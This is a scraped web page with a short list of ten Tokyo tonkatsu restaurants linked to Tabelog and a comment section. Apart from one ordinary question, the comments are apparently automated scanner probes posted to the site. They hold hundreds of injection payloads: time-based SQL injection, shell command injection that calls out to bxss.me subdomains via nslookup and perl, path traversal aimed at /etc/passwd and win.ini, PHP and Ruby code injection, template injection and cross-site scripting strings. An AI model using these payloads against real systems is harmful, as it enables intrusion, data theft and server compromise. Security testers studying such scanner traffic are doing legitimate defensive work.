1. Narikura(成蔵)
https://tabelog.com/tokyo/A1319/A131905/13236380/
2. Kippei(吉平)
https://tabelog.com/tokyo/A1310/A131002/13237293/
3. Chawanbu(車力門ちゃわんぶ)
https://tabelog.com/tokyo/A1309/A130903/13234679/
4. Tonkatsu Keita(とんかつけい太)
https://tabelog.com/tokyo/A1319/A131907/13241723/
5. Katsu Puripo(Katsuプリポー)
https://tabelog.com/tokyo/A1304/A130401/13264309/
6. Tonta(とん太)
https://tabelog.com/tokyo/A1305/A130503/13003984/
7. Hasegawa(はせ川)
https://tabelog.com/tokyo/A1312/A131201/13019126/
8. tonaktsu.jp
https://tabelog.com/tokyo/A1306/A130602/13264557/
9. Tonkasu Iwai(とんかついわい)
https://tabelog.com/tokyo/A1314/A131401/13170377/
10.Tonkatsu Daiki(とんかつ大希)
https://tabelog.com/tokyo/A1315/A131503/13263034/
24 Comments
This list is ranked by your personal preferences?
re: Justeat
hOxalz3j
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+513-513-1=0+0+0+1
re: Justeat
-1 OR 3+513-513-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
dHnvB3Sg'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 210=(SELECT 210 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 622=(SELECT 622 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 956=(SELECT 956 FROM PG_SLEEP(15))--
re: Justeat
LKBFXxz3' OR 343=(SELECT 343 FROM PG_SLEEP(15))--
re: Justeat
742ZgAjK') OR 497=(SELECT 497 FROM PG_SLEEP(15))--
re: Justeat
psHoIyOu')) OR 517=(SELECT 517 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@gkCGE
re: Justeat
adiW7vTg
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+400-400-1=0+0+0+1
re: Justeat
-1 OR 3+400-400-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
qdBRvwDQ'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 408=(SELECT 408 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 921=(SELECT 921 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 388=(SELECT 388 FROM PG_SLEEP(15))--
re: Justeat
4GJx546i' OR 311=(SELECT 311 FROM PG_SLEEP(15))--
re: Justeat
uNQyjGfC') OR 725=(SELECT 725 FROM PG_SLEEP(15))--
re: Justeat
tnvrWKjz')) OR 105=(SELECT 105 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@JQzh0
re: Justeat
1ls8FXyxO
re: Justeat
Xmc3FyE4
re: Justeat
response.write(9403036*9047613)
re: Justeat
bcc:074625.67-9330.67.026df.19990.2@bxss.me
re: Justeat
<esi:include src="http://bxss.me/rpb.png"/>
re: Justeat
${9999553+9999573}
re: Justeat
'+response.write(9403036*9047613)+'
re: Justeat
to@example.com>
bcc:074625.67-9331.67.026df.19990.2@bxss.me
re: Justeat
"+response.write(9403036*9047613)+"
re: Justeat
&n989731=v940519
re: Justeat
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Justeat
../../../../../../../../../../../../../../etc/passwd
re: Justeat
../../../../../../../../../../../../../../windows/win.ini
re: Justeat
'.gethostbyname(lc('hitfg'.'gpmbwyfq14d6e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(65).chr(121).chr(81).'
re: Justeat
file:///etc/passwd
re: Justeat
)
re: Justeat
".gethostbyname(lc("hitac"."gquzvokw62e05.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(72).chr(107).chr(82)."
re: Justeat
!(()&&!|*|*|
re: Justeat
../
re: Justeat
^(#$!@#$)(()))******
re: Justeat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Justeat
HttP://bxss.me/t/xss.html?%00
re: Justeat
echo ujbscb$()\ qrtypt\nz^xyu||a #' &echo ujbscb$()\ qrtypt\nz^xyu||a #|" &echo ujbscb$()\ qrtypt\nz^xyu||a #
re: Justeat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: Justeat
"+"A".concat(70-3).concat(22*4).concat(113).concat(65).concat(101).concat(68)+(require"socket"
Socket.gethostbyname("hitkf"+"cxwsoukiab95b.bxss.me.")[3].to_s)+"
re: Justeat
bxss.me/t/xss.html?%00
re: Justeat
&echo odtvrd$()\ icmfvt\nz^xyu||a #' &echo odtvrd$()\ icmfvt\nz^xyu||a #|" &echo odtvrd$()\ icmfvt\nz^xyu||a #
re: Justeat
Http://bxss.me/t/fit.txt
re: Justeat
'+'A'.concat(70-3).concat(22*4).concat(105).concat(70).concat(116).concat(65)+(require'socket'
Socket.gethostbyname('hitmx'+'ncbgwyhv3f0cb.bxss.me.')[3].to_s)+'
re: Justeat
|echo uioodq$()\ hziulk\nz^xyu||a #' |echo uioodq$()\ hziulk\nz^xyu||a #|" |echo uioodq$()\ hziulk\nz^xyu||a #
re: Justeat
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Justeat
http://bxss.me/t/fit.txt?.jpg
re: Justeat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Justeat
xfs.bxss.me
re: Justeat
(nslookup hitpnvjzcghogc90b8.bxss.me||perl -e "gethostbyname('hitpnvjzcghogc90b8.bxss.me')")
re: Justeat
/etc/shells
re: Justeat
';print(md5(31337));$a='
re: Justeat
$(nslookup hitkotaqnqqrz981e5.bxss.me||perl -e "gethostbyname('hitkotaqnqqrz981e5.bxss.me')")
re: Justeat
replies
re: Justeat
c:/windows/win.ini
re: Justeat
";print(md5(31337));$a="
re: Justeat
&nslookup hitklgxddkgenf57b8.bxss.me&'\"`0&nslookup hitklgxddkgenf57b8.bxss.me&`'
re: Justeat
replies
re: Justeat
bxss.me
re: Justeat
${@print(md5(31337))}
re: Justeat
&(nslookup hitwdthliqxrw55ad8.bxss.me||perl -e "gethostbyname('hitwdthliqxrw55ad8.bxss.me')")&'\"`0&(nslookup hitwdthliqxrw55ad8.bxss.me||perl -e "gethostbyname('hitwdthliqxrw55ad8.bxss.me')")&`'
re: Justeat
replies/.
re: Justeat
'"
re: Justeat
${@print(md5(31337))}\
re: Justeat
|(nslookup hityefuvneerm17e0f.bxss.me||perl -e "gethostbyname('hityefuvneerm17e0f.bxss.me')")
re: Justeat
<!--
re: Justeat
'.print(md5(31337)).'
re: Justeat
`(nslookup hitvvggzgwyay9994b.bxss.me||perl -e "gethostbyname('hitvvggzgwyay9994b.bxss.me')")`
re: Justeat
;(nslookup hitzvdzuzqftqf6e33.bxss.me||perl -e "gethostbyname('hitzvdzuzqftqf6e33.bxss.me')")|(nslookup hitzvdzuzqftqf6e33.bxss.me||perl -e "gethostbyname('hitzvdzuzqftqf6e33.bxss.me')")&(nslookup hitzvdzuzqftqf6e33.bxss.me||perl -e "gethostbyname('hitzvdzuzqftqf6e33.bxss.me')")
re: Justeat
'"()&%<zzz><ScRiPt >A0G9(9911)</ScRiPt>
re: Justeat
'"()&%<zzz><ScRiPt >A0G9(9939)</ScRiPt>
re: Justeat
9767805
re: Justeat
'"()
re: Justeat
'&&sleep(27*1000)*eaozls&&'
re: Justeat
"&&sleep(27*1000)*mzvlxh&&"
re: Justeat
'||sleep(27*1000)*fmblke||'
re: Justeat
"||sleep(27*1000)*myvhfh||"
re: Justeat
gvl1pEig
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+684-684-1=0+0+0+1
re: Justeat
-1 OR 3+684-684-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
eCtGKGlx'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 42=(SELECT 42 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 604=(SELECT 604 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 665=(SELECT 665 FROM PG_SLEEP(15))--
re: Justeat
R31CBj8e' OR 202=(SELECT 202 FROM PG_SLEEP(15))--
re: Justeat
K28ch9UK') OR 724=(SELECT 724 FROM PG_SLEEP(15))--
re: Justeat
yWAkrMZD')) OR 491=(SELECT 491 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@Ha2pW
re: Justeat
1k3LhmiSO
re: Justeat
response.write(9713621*9042244)
re: Justeat
'+response.write(9713621*9042244)+'
re: Justeat
"+response.write(9713621*9042244)+"
re: Justeat
%0abcc:074625.67-10293.67.969f4.19990.2@bxss.me
re: Justeat
../../../../../../../../../../../../../../etc/passwd
re: Justeat
to@example.com>%0d%0abcc:074625.67-10294.67.969f4.19990.2@bxss.me
re: Justeat
../../../../../../../../../../../../../../windows/win.ini
re: Justeat
file:///etc/passwd
re: Justeat
../../../../../../../../../../../../../../../proc/version
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Justeat
../../../../../../../../../../etc/passwd%00.jpg
re: Justeat
<esi:include src="http://bxss.me/rpb.png"/>
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Justeat
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Justeat
echo jgcnbw$()\ vrvswn\nz^xyu||a #' &echo jgcnbw$()\ vrvswn\nz^xyu||a #|" &echo jgcnbw$()\ vrvswn\nz^xyu||a #
re: Justeat
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Justeat
${10000116+9999222}
re: Justeat
&echo lqdujk$()\ crpdfu\nz^xyu||a #' &echo lqdujk$()\ crpdfu\nz^xyu||a #|" &echo lqdujk$()\ crpdfu\nz^xyu||a #
re: Justeat
/etc/passwd
re: Justeat
|echo exbltl$()\ leslbf\nz^xyu||a #' |echo exbltl$()\ leslbf\nz^xyu||a #|" |echo exbltl$()\ leslbf\nz^xyu||a #
re: Justeat
%2fetc%2fpasswd
re: Justeat
(nslookup hitsqjrhytjure60b0.bxss.me||perl -e "gethostbyname('hitsqjrhytjure60b0.bxss.me')")
re: Justeat
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Justeat
$(nslookup hitzxyzbrosfa9649f.bxss.me||perl -e "gethostbyname('hitzxyzbrosfa9649f.bxss.me')")
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Justeat
&nslookup hitjsxnsftnrl94398.bxss.me&'\"`0&nslookup hitjsxnsftnrl94398.bxss.me&`'
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Justeat
&(nslookup hitlonjtykcqqf20cf.bxss.me||perl -e "gethostbyname('hitlonjtykcqqf20cf.bxss.me')")&'\"`0&(nslookup hitlonjtykcqqf20cf.bxss.me||perl -e "gethostbyname('hitlonjtykcqqf20cf.bxss.me')")&`'
re: Justeat
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Justeat
|(nslookup hitaxrqfvpwfmc7a1e.bxss.me||perl -e "gethostbyname('hitaxrqfvpwfmc7a1e.bxss.me')")
re: Justeat
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Justeat
`(nslookup hitjjjtmxneov095fe.bxss.me||perl -e "gethostbyname('hitjjjtmxneov095fe.bxss.me')")`
re: Justeat
)
re: Justeat
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Justeat
;(nslookup hitiiwyvyknvx5816c.bxss.me||perl -e "gethostbyname('hitiiwyvyknvx5816c.bxss.me')")|(nslookup hitiiwyvyknvx5816c.bxss.me||perl -e "gethostbyname('hitiiwyvyknvx5816c.bxss.me')")&(nslookup hitiiwyvyknvx5816c.bxss.me||perl -e "gethostbyname('hitiiwyvyknvx5816c.bxss.me')")
re: Justeat
!(()&&!|*|*|
re: Justeat
file:///etc/passwd
re: Justeat
^(#$!@#$)(()))******
re: Justeat
/\../\../\../\../\../\../\../etc/passwd
re: Justeat
/WEB-INF/web.xml
re: Justeat
C:\WINDOWS\system32\drivers\etc\hosts
re: Justeat
../../../../../../../../../../windows/win.ini%00.jpg
re: Justeat
/../../../../../../../../../../boot.ini
re: Justeat
'.gethostbyname(lc('hitna'.'unwygrpdc2a5b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(80).chr(104).chr(79).'
re: Justeat
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Justeat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Justeat
".gethostbyname(lc("hitth"."oqyasggs407a7.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(76).chr(109).chr(87)."
re: Justeat
..\..\..\..\..\..\..\..\windows\win.ini
re: Justeat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Justeat
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Justeat
Http://bxss.me/t/fit.txt
re: Justeat
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Justeat
http://bxss.me/t/fit.txt%3F.jpg
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Justeat
/etc/shells
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Justeat
c:/windows/win.ini
re: Justeat
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Justeat
bxss.me
re: Justeat
WEB-INF/web.xml
re: Justeat
HttP://bxss.me/t/xss.html?%00
re: Justeat
"+"A".concat(70-3).concat(22*4).concat(114).concat(90).concat(121).concat(74)+(require"socket"
Socket.gethostbyname("hitdd"+"amayibpt6819b.bxss.me.")[3].to_s)+"
re: Justeat
WEB-INF\web.xml
re: Justeat
bxss.me/t/xss.html?%00
re: Justeat
'+'A'.concat(70-3).concat(22*4).concat(108).concat(72).concat(100).concat(84)+(require'socket'
Socket.gethostbyname('hitgh'+'ndknfzmi6dee5.bxss.me.')[3].to_s)+'
re: Justeat
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Justeat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Justeat
'"
re: Justeat
';print(md5(31337));$a='
re: Justeat
<!--
re: Justeat
";print(md5(31337));$a="
re: Justeat
${@print(md5(31337))}
re: Justeat
${@print(md5(31337))}\
re: Justeat
'.print(md5(31337)).'
re: Justeat
1
re: Justeat
1
re: Justeat
-1 OR 2+145-145-1=0+0+0+1 --
re: Justeat
-1 OR 3+145-145-1=0+0+0+1 --
re: Justeat
-1 OR 2+715-715-1=0+0+0+1
re: Justeat
-1 OR 3+715-715-1=0+0+0+1
re: Justeat
-1' OR 2+573-573-1=0+0+0+1 --
re: Justeat
-1' OR 3+573-573-1=0+0+0+1 --
re: Justeat
-1' OR 2+547-547-1=0+0+0+1 or '3wPl82Y4'='
re: Justeat
-1' OR 3+547-547-1=0+0+0+1 or '3wPl82Y4'='
re: Justeat
-1" OR 2+192-192-1=0+0+0+1 --
re: Justeat
-1" OR 3+192-192-1=0+0+0+1 --
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
9XPZklVf'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 823=(SELECT 823 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 637=(SELECT 637 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 220=(SELECT 220 FROM PG_SLEEP(15))--
re: Justeat
ZBfh7c9V' OR 410=(SELECT 410 FROM PG_SLEEP(15))--
re: Justeat
V0NxUwov') OR 993=(SELECT 993 FROM PG_SLEEP(15))--
re: Justeat
WwgUOT52')) OR 324=(SELECT 324 FROM PG_SLEEP(15))--
re: Justeat
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@W4qOy
re: Justeat
1
re: Justeat
1
re: Justeat
1
re: Justeat
u4pqw3RQ
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+670-670-1=0+0+0+1
re: Justeat
-1 OR 3+670-670-1=0+0+0+1
re: Justeat
1'"
re: Justeat
@@gHuvH
